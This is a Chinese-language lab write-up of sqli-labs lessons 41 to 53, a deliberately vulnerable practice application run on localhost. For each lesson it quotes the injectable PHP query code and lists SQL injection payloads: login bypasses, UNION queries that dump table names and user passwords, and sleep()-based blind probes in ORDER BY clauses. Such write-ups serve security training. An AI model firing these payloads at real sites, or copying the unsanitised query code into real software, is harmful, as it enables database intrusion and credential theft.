SQLI-LAB 的 实战记录(Less 41 - Less 53)

以下内容 只是 本人 在做 sqli-lab 练习时 写下的记录，仅供参考。
因为本人学过一些sql注入的内容，所以大部分内容是没有讲解的，如有不清楚的地方，请自行使用搜索引擎查询，相信会得到所需的内容。

Less - 41 stacked Query Intiger type blind

（第41节：层次化查询 数字型 盲注 ）

Test:

    http://localhost/sqli-lab/Less-41/index.php?id=1'

注：有问题但不显示报错信息

Sourse Code：

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";if (mysqli_multi_query($con1, $sql)){    if ($result = mysqli_store_result($con1)){        if($row = mysqli_fetch_row($result)){              printf("Your Username is : %s", $row[1]);            printf("Your Password is : %s", $row[2]);        }    }    if (mysqli_more_results($con1)) {    }}

Solution：

    http://localhost/sqli-lab/Less-41/index.php?id=0 or 1=1 %23    其它：    http://localhost/sqli-lab/Less-41/index.php?id=0 union select 1,version(),database() %23    http://localhost/sqli-lab/Less-41/index.php?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23    http://localhost/sqli-lab/Less-41/index.php?id=0 union select 1,group_concat(username),group_concat(password) from security.users where 1 %23       

Less - 42 Stacked Query error based

（第42节：层次化查询 基于错误）

Test:

    http://localhost/sqli-lab/Less-42/index.php        login_user=admin&login_password=11'&mysubmit=login

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”11”’ at line 1
注：password周围是单引号

Sourse Code：

$username = mysqli_real_escape_string($con1,$_POST["login_user"]);$password = $_POST["login_password"];$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";if (@mysqli_multi_query($con1, $sql)){/* store first result set */  if($result = @mysqli_store_result($con1)){    if($row = @mysqli_fetch_row($result)){      if ($row[1]){        return $row[1];      }else{        return 0;      }    }  }else{    echo '<font size="5" color= "#FFFF00">';    print_r(mysqli_error($con1));    echo "</font>";   }}else{  echo '<font size="5" color= "#FFFF00">';  print_r(mysqli_error($con1));  echo "</font>"; }

Solution：

    login_user=admin&login_password=1' or '1'='1&mysubmit=login    其它：    login_user=admin&login_password=0' union select 1,database(),3 or '1'='1&mysubmit=login    login_user=admin&login_password=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #&mysubmit=login    login_user=admin&login_password=0' union select 1,group_concat(username),group_concat(password) from security.users where 1 #&mysubmit=login

Less - 43 stacked Query String type

（第43节：层次化查询 字符类型）

Test:

    http://localhost/sqli-lab/Less-43/index.php        login_user=admin&login_password=11'&mysubmit=login

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”11”)’ at line 1
注：password周围是单引号

Sourse Code：

$username = mysqli_real_escape_string($con1,$_POST["login_user"]);$password = $_POST["login_password"];$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";if (@mysqli_multi_query($con1, $sql)){if($result = @mysqli_store_result($con1)){    if($row = @mysqli_fetch_row($result)){        if ($row[1]){             return $row[1];        }else{             return 0;        }    }}else{     print_r(mysqli_error($con1));}}else{     print_r(mysqli_error($con1));  }

Solution：

    login_user=admin&login_password=1') or ('1')=('1&mysubmit=login    其它：    login_user=admin&login_password=0') union select 1,database(),3 or ('1')=('1&mysubmit=login    login_user=admin&login_password=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #&mysubmit=login    login_user=admin&login_password=0') union select 1,group_concat(username),group_concat(password) from security.users where 1 #&mysubmit=login

Less - 44 Stacked Query blind

（第44节：层次化查询 盲注）

Test:

    http://localhost/sqli-lab/Less-44/index.php        login_user=admin&login_password=0'&mysubmit=login

注：没有显示报错信息

Sourse Code：

$username = mysqli_real_escape_string($con1,$_POST["login_user"]);$password = $_POST["login_password"];$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";if (@mysqli_multi_query($con1, $sql)){    if($result = @mysqli_store_result($con1)){        if($row = @mysqli_fetch_row($result)){            if ($row[1]){                 return $row[1];            }else{                 return 0;            }        }    }}

Solution：

    login_user=admin&login_password=1' or '1'='1&mysubmit=login    其它：    login_user=admin&login_password=0' union select 1,database(),3 or '1'='1&mysubmit=login    login_user=admin&login_password=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #&mysubmit=login    login_user=admin&login_password=0' union select 1,group_concat(username),group_concat(password) from security.users where 1 #&mysubmit=login

Less - 45 Stacked Query Blind based twist

（第45节：层次化查询 基于盲注 变形 ）

Test:

    http://localhost/sqli-lab/Less-45/index.php        login_user=admin&login_password=0'&mysubmit=login

注：没有显示报错信息

Sourse Code：

$username = mysqli_real_escape_string($con1, $_POST["login_user"]);$password = $_POST["login_password"];$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";if (@mysqli_multi_query($con1, $sql)){    if($result = @mysqli_store_result($con1)){        if($row = @mysqli_fetch_row($result)){            if ($row[1]){                 return $row[1];            }else{                 return 0;            }        }    }}

Solution：

    login_user=admin&login_password=1') or ('1')=('1&mysubmit=login    其它：    login_user=admin&login_password=0') union select 1,database(),3 or ('1')=('1&mysubmit=login    login_user=admin&login_password=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #&mysubmit=login    login_user=admin&login_password=0') union select 1,group_concat(username),group_concat(password) from security.users where 1 #&mysubmit=login

Less - 46 ORDER BY-Error-Numeric

（第46节：GET - 基于错误 - 数字型 - ORDER BY 从句）

Test:

    http://localhost/sqli-lab/Less-46/index.php?sort=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1
注：数字型

    http://localhost/sqli-lab/Less-46/index.php?sort=1+asc    http://localhost/sqli-lab/Less-46/index.php?sort=1+desc

注： 可以通过asc 和desc查看返回数据是否相同来简单判断是否存在orderby注入

Sourse Code：

$sql = "SELECT * FROM users ORDER BY $id";$result = mysql_query($sql);if ($result){    while ($row = mysql_fetch_assoc($result)){        echo $row['id'];        echo $row['username'];        echo $row['password'];    }   }else{     print_r(mysql_error());  }

Solution：

    http://localhost/sqli-lab/Less-46/index.php?sort=1 and if(1=1, sleep(1), null)    其它：    http://localhost/sqli-lab/Less-46/index.php?sort=1 and (length(database())) = 8 and if(1=1, sleep(1), null)    http://localhost/sqli-lab/Less-46/index.php?sort=1 and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null)

Less - 47 ORDER BY Clause-Error-Single quote

（第47节：ORDER BY 从句 - 基于错误-单引号 ）

Test:

http://localhost/sqli-lab/Less-47/index.php?sort=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”1”’ at line 1
注：sort周围是单引号

Sourse Code：

$sql = "SELECT * FROM users ORDER BY '$id'";$result = mysql_query($sql);if ($result){    while ($row = mysql_fetch_assoc($result)){        echo $row['id'];        echo $row['username'];        echo $row['password'];    }     }else{     print_r(mysql_error());}

Solution：

    http://localhost/sqli-lab/Less-47/index.php?sort=1' and if(1=1, sleep(1), null) and '1'='1    其它：    http://localhost/sqli-lab/Less-47/index.php?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1    http://localhost/sqli-lab/Less-47/index.php?sort=1' and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null) and '1'='1

Less - 48 ORDER BY Clause Blind based

（第48节：ORDER BY 从句 基于盲注 ）

Test:

    http://localhost/sqli-lab/Less-48/index.php?sort=1'    http://localhost/sqli-lab/Less-48/index.php?sort=1"    http://localhost/sqli-lab/Less-48/index.php?sort=1')    http://localhost/sqli-lab/Less-48/index.php?sort=1")

注：均没有显示报错信息

Sourse Code：

$sql = "SELECT * FROM users ORDER BY $id";$result = mysql_query($sql);if ($result){    while ($row = mysql_fetch_assoc($result)){        echo $row['id'];        echo $row['username'];        echo $row['password'];    }   }

Solution：

    http://localhost/sqli-lab/Less-48/index.php?sort=1 and if(1=1, sleep(1), null)    其它：    http://localhost/sqli-lab/Less-48/index.php?sort=1 and (length(database())) = 8 and if(1=1, sleep(1), null)    http://localhost/sqli-lab/Less-48/index.php?sort=1 and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null)

Less - 49 ORDER BY Clause Blind based

（第49节：ORDER BY 从句 基于盲注 ）

Test:

    http://localhost/sqli-lab/Less-49/index.php?sort=1'

注：没有显示报错信息

http://localhost/sqli-lab/Less-49/index.php?sort=1"

注：正常，再结合上一条，sort周围是单引号

Sourse Code：

$sql = "SELECT * FROM users ORDER BY '$id'";$result = mysql_query($sql);if ($result){    while ($row = mysql_fetch_assoc($result)){        echo $row['username'];        echo $row['password'];    }   }

Solution：

    http://localhost/sqli-lab/Less-49/index.php?sort=1' and if(1=1, sleep(1), null) and '1'='1    其它：    http://localhost/sqli-lab/Less-49/index.php?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1    http://localhost/sqli-lab/Less-49/index.php?sort=1' and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null) and '1'='1

Less - 50 ORDER BY Clause Blind based

（第50节：ORDER BY 从句 基于盲注）

Test:

    http://localhost/sqli-lab/Less-50/index.php?sort=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1
注：数字型

Sourse Code：

$sql="SELECT * FROM users ORDER BY $id";if (mysqli_multi_query($con1, $sql)){     if ($result = mysqli_store_result($con1)){          while($row = mysqli_fetch_row($result)){                 printf("%s", $row[0]);               printf("%s", $row[1]);               printf("%s", $row[2]);          }     }}else{     print_r(mysqli_error($con1));}

Solution：

    http://localhost/sqli-lab/Less-50/index.php?sort=1 and if(1=1, sleep(1), null)    其它：    http://localhost/sqli-lab/Less-50/index.php?sort=1 and (length(database())) = 8 and if(1=1, sleep(1), null)    http://localhost/sqli-lab/Less-50/index.php?sort=1 and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null)

Less - 51 ORDER BY Clause Blind based

（第51节：ORDER BY 从句 基于盲注 ）

Test:

    http://localhost/sqli-lab/Less-51/index.php?sort=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”1”’ at line 1
注：sort周围是单引号

Sourse Code：

$sql="SELECT * FROM users ORDER BY '$id'";if (mysqli_multi_query($con1, $sql)){    if ($result = mysqli_store_result($con1)){        while($row = mysqli_fetch_row($result)){            printf("%s", $row[0]);            printf("%s", $row[1]);            printf("%s", $row[2]);        }    }}else{     print_r(mysqli_error($con1));}

Solution：

    http://localhost/sqli-lab/Less-51/index.php?sort=1' and if(1=1, sleep(1), null) and '1'='1    其它：    http://localhost/sqli-lab/Less-51/index.php?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1    http://localhost/sqli-lab/Less-51/index.php?sort=1' and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null) and '1'='1

Less - 52 ORDER BY Clause Blind based

（第52节：ORDER BY 从句 基于盲注 ）

Test:

    http://localhost/sqli-lab/Less-52/index.php?sort=1'    http://localhost/sqli-lab/Less-52/index.php?sort=1"    http://localhost/sqli-lab/Less-52/index.php?sort=1')    http://localhost/sqli-lab/Less-52/index.php?sort=1")

注：均没有显示报错信息

Sourse Code：

$sql="SELECT * FROM users ORDER BY $id";if (mysqli_multi_query($con1, $sql)){    if ($result = mysqli_store_result($con1)){        while($row = mysqli_fetch_row($result)){            printf("%s", $row[0]);            printf("%s", $row[1]);            printf("%s", $row[2]);        }    }}

Solution：

    http://localhost/sqli-lab/Less-52/index.php?sort=1 and if(1=1, sleep(1), null)    其它：    http://localhost/sqli-lab/Less-52/index.php?sort=1 and (length(database())) = 8 and if(1=1, sleep(1), null)    http://localhost/sqli-lab/Less-52/index.php?sort=1 and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null)

Less - 53 ORDER BY Clause Blind based

（第53节：ORDER BY 从句 基于盲注 ）

Test:

    http://localhost/sqli-lab/Less-53/index.php?sort=1'

注：没有显示报错信息

    http://localhost/sqli-lab/Less-53/index.php?sort=1"

注：正常，再结合上一条，sort周围是单引号

Sourse Code：

$sql="SELECT * FROM users ORDER BY '$id'";if (mysqli_multi_query($con1, $sql)) {    if ($result = mysqli_store_result($con1)){        while($row = mysqli_fetch_row($result)){            printf("%s", $row[0]);            printf("%s", $row[1]);            printf("%s", $row[2]);        }    }}

Solution：

    http://localhost/sqli-lab/Less-53/index.php?sort=1' and if(1=1, sleep(1), null) and '1'='1    其它：    http://localhost/sqli-lab/Less-53/index.php?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1    http://localhost/sqli-lab/Less-53/index.php?sort=1' and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null) and '1'='1